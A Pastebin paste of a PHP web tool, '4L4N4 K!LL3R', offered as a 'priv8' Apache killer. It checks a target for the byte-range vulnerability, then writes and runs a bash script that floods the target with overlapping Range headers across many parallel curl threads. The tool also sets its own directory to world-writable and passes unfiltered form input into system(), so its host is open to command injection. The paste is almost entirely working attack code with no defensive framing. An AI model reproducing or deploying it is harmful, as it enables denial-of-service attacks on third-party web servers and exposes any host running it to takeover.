G2A Many GEOs
SHARE
TWEET

[4L4N4 K!LL3R by S4(uR4] top priv8 agressive apache killer e

a guest Oct 1st, 2011 6,447 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. /*
  4.  
  5.     Devoted my ex-girlfriend Kh. Alana[from Kagan city] (;
  6.     k!ll m3 --- s4f3 the fuck'!n w0rldzzzzz
  7.     S4(uR4, r00tw0rm __2011__
  8.     w4tch u. h4ck u. fuck u.
  9.     Pr!v8 2 Publ!c
  10. */
  11.  
  12. error_reporting(0);
  13. `chmod -R 777 *`;
  14.  
  15. ?>
  16.  
  17. <html><head><title>~=4L4N4 K!LL3R by S4(uR4=~</title>
  18. <meta charset='utf-8'>
  19. </head><body bgcolor = "black">
  20. <font color='#969696'>
  21. <pre>
  22. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  23. 0             __      __   __                   __                           1
  24. 1           /'__`\  /'__`\/\ \__              /'__`\                         0
  25. 0     _ __ /\ \/\ \/\ \/\ \ \ ,_\  __  __  __/\ \/\ \  _ __    ___ ___       1
  26. 1    /\`'__\ \ \ \ \ \ \ \ \ \ \/ /\ \/\ \/\ \ \ \ \ \/\`'__\/' __` __`\     0
  27. 0    \ \ \/ \ \ \_\ \ \ \_\ \ \ \_\ \ \_/ \_/ \ \ \_\ \ \ \/ /\ \/\ \/\ \    1
  28. 1     \ \_\  \ \____/\ \____/\ \__\\ \___x___/'\ \____/\ \_\ \ \_\ \_\ \_\   0
  29. 0      \/_/   \/___/  \/___/  \/__/ \/__//__/   \/___/  \/_/  \/_/\/_/\/_/   1
  30. 1                                                                            0
  31. 0                                                                            1
  32. 1              <font color="red">                         >> 4L4N4 K!LL3R</font>                      0
  33. 0                                       >> author : S4(uR4                   1
  34. 1                                       >> sanjar[at]xakep[dot]ru            0
  35. 0                                       >> Priv8 v.0.1                       1
  36. 1                                       >> )c(  2011                         0
  37. 0                                                                            1
  38. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-0
  39. </pre></font>
  40.  
  41. <h3><font color='555555'>[CHECK] (Vulned : "HTTP/1.1 206 Partial Content") ::</font></h3>
  42. <form action="index.php" method="POST">
  43. <font color="hack">TESTED URL : </font><input type="text" name="test_url"><br>
  44. <input type=submit value="Ch3ck 1t!">
  45. </form>
  46. <font color='red'>
  47. <?php
  48.  
  49. echo "<br></pre>";
  50.        //if(!empty($_POST[0])){
  51.        echo "<br><font color='hack'>"."[+] Server Test Running : <pre>";
  52.        echo "<br>";
  53.        system('curl -I -H "Range : bytes=0-1,0-2" -s '.$_POST["test_url"]);
  54.        echo "</pre>";
  55.  
  56. ?>
  57.  
  58. <h3><font color='555555'>[ATACK] ::</font></h3>
  59. <form action="index.php" method="POST">
  60. <font color='hack'>REQUEST : </font> <input type=text name="request"><br>
  61. <font color='hack'>THREADS : </font> <input type="text" name="threads"><br>
  62. <font color="hack">URL     : </font><input type="text" name="url"><br>
  63. <input type=submit value="Fuck UP!">
  64. </form>
  65.  
  66. <h3><font color='555555'>[LOG] ::</font></h3>
  67.  
  68. <?php
  69.  
  70. echo "<font color='555555'>PWD :: ".`pwd`;
  71. echo "<br>SYSTEM :: ".`uname -a`;
  72. echo "<br>ID :: ".`id`;
  73. echo "<br>DATE :: ".`date`."</font><br>";
  74.  
  75.  
  76. $tmp1 = "alana_kill3r.sh";
  77. `touch alana_kill3r.sh`;
  78. $apache_killer = <<<XPLOIT
  79. #!/bin/bash
  80. test "$1" == "" && echo $0 requests threads target-url && exit 0
  81. seq 1 $1 | xargs -I{} -P $2 curl -I -H "User-Agent:" \
  82. -H "Range: bytes=0-`printf ',5-%d' {10..1000}`" \
  83. --compress -s $3 | grep HTTP
  84. XPLOIT;
  85.  
  86. if (is_writable($tmp1)) {
  87.     if (!$handle = fopen($tmp1, 'w+')) {
  88.          echo "<font color='red'>[x] Can't open file ($tmp1)</font>";
  89.          exit;
  90.     }
  91.     if (fwrite($handle, $apache_killer) === FALSE) {
  92.         echo "<font color='red'>[x] Can't write file ($tmp1)</font>";
  93.         exit;
  94.     }
  95.     echo "<br><font color='hack'>"."[+] ALL OK, xpl0it Writed</font>";
  96.     fclose($handle);
  97. } else {
  98.     echo "<br><font color='red'>[x] File $tmp1 has not access to write</font>";
  99. }
  100.  
  101. ?>
  102.  
  103.  
  104.  
  105.  
  106. <?php
  107. echo"<br><pre>";
  108. $pwd = "-al";
  109. system("ls ".$pwd);
  110. echo "<br></pre>";
  111.        echo "<br><font color='hack'>"."[+] Xploit Started with : <pre>";
  112.        `chmod +x`.$tmp1;
  113.        echo "<br>root@r00tw0rm:$ ";
  114.        system("bash ./".$tmp1." ".$_POST["request"]." ".$_POST["threads"]." ".$_POST["url"]);
  115.        echo "</pre>";
  116. ?>
  117.  
  118.  
  119. </font>
  120. </body></html>
  121.  
RAW Paste Data
Ledger Nano X - The secure hardware wallet
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top